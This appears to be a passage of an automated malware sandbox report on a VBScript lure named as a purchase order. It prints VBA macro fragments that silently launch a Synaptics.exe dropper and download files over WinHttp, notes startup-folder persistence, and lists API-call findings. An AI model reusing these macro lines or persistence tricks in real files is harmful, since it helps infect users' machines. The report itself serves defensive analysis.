                                Source: 32pAPMdc.xlsm.8.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                Source: 32pAPMdc.xlsm.8.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                Source: 32pAPMdc.xlsm.8.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                Source: 32pAPMdc.xlsm.8.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                Source: 32pAPMdc.xlsm.8.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                Source: 32pAPMdc.xlsm.8.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                Source: HTAGVDFUIE.xlsm.8.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                Source: HTAGVDFUIE.xlsm.8.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: HTAGVDFUIE.xlsm.8.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: HTAGVDFUIE.xlsm.8.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: HTAGVDFUIE.xlsm.8.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                Source: HTAGVDFUIE.xlsm.8.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                Source: HTAGVDFUIE.xlsm.8.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                Source: HTAGVDFUIE.xlsm.8.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                Source: HTAGVDFUIE.xlsm.8.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                Source: HTAGVDFUIE.xlsm.8.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                Source: HTAGVDFUIE.xlsm.8.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                Document contains an embedded VBA with functions possibly related to ADO stream file operations
                                Source: 32pAPMdc.xlsm.8.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                Source: HTAGVDFUIE.xlsm.8.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                Document contains an embedded VBA with functions possibly related to HTTP operations
                                Source: 32pAPMdc.xlsm.8.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                Source: HTAGVDFUIE.xlsm.8.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                                Source: 32pAPMdc.xlsm.8.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                                Source: HTAGVDFUIE.xlsm.8.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                                Sample has a suspicious name (potential lure to open the executable)
                                Source: Purchase Order No. G02873362-Docx.vbsStatic file information: Suspicious name
                                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001E29C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,7_2_001E29C2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_002502AA NtdllDialogWndProc_W,7_2_002502AA
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024E769 NtdllDialogWndProc_W,CallWindowProcW,7_2_0024E769
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024EA4E NtdllDialogWndProc_W,7_2_0024EA4E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001FAC99 NtdllDialogWndProc_W,7_2_001FAC99
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,7_2_0024ECBC
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001FAD5C NtdllDialogWndProc_W,745EC8D0,NtdllDialogWndProc_W,7_2_001FAD5C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,7_2_0024EFA8
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001FAFB4 GetParent,NtdllDialogWndProc_W,7_2_001FAFB4
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024F0A1 SendMessageW,NtdllDialogWndProc_W,7_2_0024F0A1
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,7_2_0024F122
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024F37C NtdllDialogWndProc_W,7_2_0024F37C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024F3AB NtdllDialogWndProc_W,7_2_0024F3AB
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024F3DA NtdllDialogWndProc_W,7_2_0024F3DA
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024F425 NtdllDialogWndProc_W,7_2_0024F425
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024F45A ClientToScreen,NtdllDialogWndProc_W,7_2_0024F45A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024F594 GetWindowLongW,NtdllDialogWndProc_W,7_2_0024F594
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,7_2_0024F5D0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001FB7F2 NtdllDialogWndProc_W,7_2_001FB7F2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001FB845 NtdllDialogWndProc_W,7_2_001FB845
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024FE80 NtdllDialogWndProc_W,7_2_0024FE80
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,7_2_0024FF04
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,7_2_0024FF91
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E029C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,16_2_00E029C2
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E702AA NtdllDialogWndProc_W,16_2_00E702AA
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6E769 NtdllDialogWndProc_W,CallWindowProcW,16_2_00E6E769
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6EA4E NtdllDialogWndProc_W,16_2_00E6EA4E
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,16_2_00E6ECBC
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E1AC99 NtdllDialogWndProc_W,16_2_00E1AC99
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E1AD5C NtdllDialogWndProc_W,745EC8D0,NtdllDialogWndProc_W,16_2_00E1AD5C
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,16_2_00E6EFA8
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E1AFB4 GetParent,NtdllDialogWndProc_W,16_2_00E1AFB4
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6F0A1 SendMessageW,NtdllDialogWndProc_W,16_2_00E6F0A1
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,16_2_00E6F122
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6F3DA NtdllDialogWndProc_W,16_2_00E6F3DA
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6F3AB NtdllDialogWndProc_W,16_2_00E6F3AB
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6F37C NtdllDialogWndProc_W,16_2_00E6F37C
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6F45A ClientToScreen,NtdllDialogWndProc_W,16_2_00E6F45A
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6F425 NtdllDialogWndProc_W,16_2_00E6F425
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,16_2_00E6F5D0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6F594 GetWindowLongW,NtdllDialogWndProc_W,16_2_00E6F594
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E1B7F2 NtdllDialogWndProc_W,16_2_00E1B7F2
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E1B845 NtdllDialogWndProc_W,16_2_00E1B845
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6FE80 NtdllDialogWndProc_W,16_2_00E6FE80
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,16_2_00E6FF91
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,16_2_00E6FF04
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001E29C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,22_2_001E29C2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_002502AA NtdllDialogWndProc_W,22_2_002502AA
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024E769 NtdllDialogWndProc_W,CallWindowProcW,22_2_0024E769
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024EA4E NtdllDialogWndProc_W,22_2_0024EA4E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001FAC99 NtdllDialogWndProc_W,22_2_001FAC99
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,22_2_0024ECBC
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001FAD5C NtdllDialogWndProc_W,745EC8D0,NtdllDialogWndProc_W,22_2_001FAD5C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,22_2_0024EFA8
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001FAFB4 GetParent,NtdllDialogWndProc_W,22_2_001FAFB4
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024F0A1 SendMessageW,NtdllDialogWndProc_W,22_2_0024F0A1
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,22_2_0024F122
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024F37C NtdllDialogWndProc_W,22_2_0024F37C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024F3AB NtdllDialogWndProc_W,22_2_0024F3AB
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024F3DA NtdllDialogWndProc_W,22_2_0024F3DA
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024F425 NtdllDialogWndProc_W,22_2_0024F425
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024F45A ClientToScreen,NtdllDialogWndProc_W,22_2_0024F45A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024F594 GetWindowLongW,NtdllDialogWndProc_W,22_2_0024F594
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,22_2_0024F5D0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001FB7F2 NtdllDialogWndProc_W,22_2_001FB7F2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001FB845 NtdllDialogWndProc_W,22_2_001FB845
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024FE80 NtdllDialogWndProc_W,22_2_0024FE80
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,22_2_0024FF04
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,22_2_0024FF91
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0022702F: DeviceIoControl,CloseHandle,7_2_0022702F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0021B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74755590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,7_2_0021B9F1
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_002282D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,7_2_002282D0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E482D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,16_2_00E482D0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_002282D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,22_2_002282D0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_002430AD7_2_002430AD
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001F36807_2_001F3680
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001EDCD07_2_001EDCD0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001EA0C07_2_001EA0C0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_002001837_2_00200183
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0022220C7_2_0022220C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001E85307_2_001E8530
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_002006777_2_00200677
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001E66707_2_001E6670
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_002187797_2_00218779
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024A8DC7_2_0024A8DC
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00200A8F7_2_00200A8F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001E6BBC7_2_001E6BBC
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0020AC837_2_0020AC83
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001E8CA07_2_001E8CA0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001FAD5C7_2_001FAD5C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00214EBF7_2_00214EBF
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00200EC47_2_00200EC4
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0021113E7_2_0021113E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_002012F97_2_002012F9
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0021542F7_2_0021542F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024F5D07_2_0024F5D0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0021599F7_2_0021599F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0020DA747_2_0020DA74
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001E5D327_2_001E5D32
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0020BDF67_2_0020BDF6
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001EBDF07_2_001EBDF0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00201E5A7_2_00201E5A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0020DF697_2_0020DF69
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0022BFB87_2_0022BFB8
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00217FFD7_2_00217FFD
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E0DCD016_2_00E0DCD0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E0A0C016_2_00E0A0C0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E4220C16_2_00E4220C
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E203C916_2_00E203C9
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E0853016_2_00E08530
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E0667016_2_00E06670
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E2067716_2_00E20677
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E3877916_2_00E38779
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6A8DC16_2_00E6A8DC
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E20A8F16_2_00E20A8F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E06BBC16_2_00E06BBC
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E08CA016_2_00E08CA0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E2AC8316_2_00E2AC83
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E1AD5C16_2_00E1AD5C
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E20EC416_2_00E20EC4
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E34EBF16_2_00E34EBF
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E630AD16_2_00E630AD
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E3113E16_2_00E3113E
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E212F916_2_00E212F9
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E3542F16_2_00E3542F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6F5D016_2_00E6F5D0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E1368016_2_00E13680
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E3599F16_2_00E3599F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E2DA7416_2_00E2DA74
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E0BDF016_2_00E0BDF0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E2BDF616_2_00E2BDF6
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E05D3216_2_00E05D32
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E21E5A16_2_00E21E5A
